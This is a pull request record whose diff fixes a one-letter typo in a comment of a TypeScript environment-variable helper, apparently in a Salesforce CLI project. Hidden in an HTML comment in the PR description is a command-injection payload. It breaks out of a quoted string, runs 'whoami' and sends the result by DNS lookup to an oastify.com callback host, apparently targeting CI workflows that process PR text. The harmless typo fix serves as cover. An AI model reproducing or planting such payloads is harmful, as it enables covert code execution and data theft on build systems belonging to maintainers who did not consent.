### PR TITLE
fix(typo): fix `env` word

### DIFF
--- a/src/util/env.ts
+++ b/src/util/env.ts
@@ -46,7 +46,7 @@ export class Env extends EnvVars {
   }
 
   public normalizeAutoupdateDisabled(): void {
-    // Ensure that the legacy envar always causes the oclif counterpart to be set
+    // Ensure that the legacy envvar always causes the oclif counterpart to be set
     // see https://github.com/oclif/plugin-update/blob/3946fb296a0a95544ab6364b36a1f7422c8aeddf/src/hooks/init.ts#L22
     if (this.getBoolean(Env.SF_AUTOUPDATE_DISABLE)) {
       this.setBoolean(Env.SF_DISABLE_AUTOUPDATE, true);


### PR DESCRIPTION
<!-- https://github.com/ "; nslookup $(whoami).334lmaua747cangovpy59rbtgkmba1yq.oastify.com ; #/actions/runs/ -->
### What does this PR do?
Just adds a missing `v` character.

### Acceptance Criteria
n/a

### Testing Notes
n/a

### Checklist
- [X] This change has been approved by the CLI Review Board or approval isn't required. Anything that adds/changes/deletes commands, flags, output, or json output has to be reviewed.
- [X] Does this follow the [deprecation policy](https://developer.salesforce.com/docs/atlas.en-us.sfdx_dev.meta/sfdx_dev/sfdx_dev_cli_deprecation.htm)?

### What issues does this PR fix or reference?
n/a